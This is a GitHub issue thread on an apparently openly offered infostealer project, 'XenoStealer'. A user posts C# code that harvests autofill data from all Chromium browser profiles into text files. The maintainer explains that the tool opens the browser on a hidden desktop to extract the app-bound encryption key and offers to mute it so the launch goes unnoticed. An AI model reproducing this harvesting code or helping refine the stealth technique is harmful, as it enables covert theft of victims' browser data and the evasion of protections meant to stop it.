moom825 / XenoStealer

MIT License
18 stars 7 forks source link

error #3

Open Belik-75 opened 1 week ago

Belik-75 commented 1 week ago

when i try something it makes the opera GX open sound:

code:

                        foreach (DataExtractionStructs.ChromiumBrowser browser in Chromium.GetAllInfo(DataExtractionStructs.ChromiumBrowserOptions.Autofills))
                        {
                            foreach (var profile in browser.profiles)
                            {
                                if (profile.autofills != null)
                                {
                                    string autofillsDirectory = Path.Combine(ChromiumDirectory, "Auto Fills");
                                    Directory.CreateDirectory(autofillsDirectory);
                                    string filePath = Path.Combine(autofillsDirectory, $"{browser.browserName}_AutoFills.txt");
                                    foreach (ChromiumAutoFill autofills in profile.autofills)
                                    {
                                        File.AppendAllText(filePath, $"{autofills.ToString()}\n");
                                    }
                                }
                            }
                        }
moom825 commented 1 week ago

Hi there, due to chromiums new appbound encryption, XenoStealer starts the browser in a hidden desktop and extracts the key, starting the browser is a side effect. Ill look into it and see if i can mute the browser before it can make any noise

Belik-75 commented 1 week ago

thank you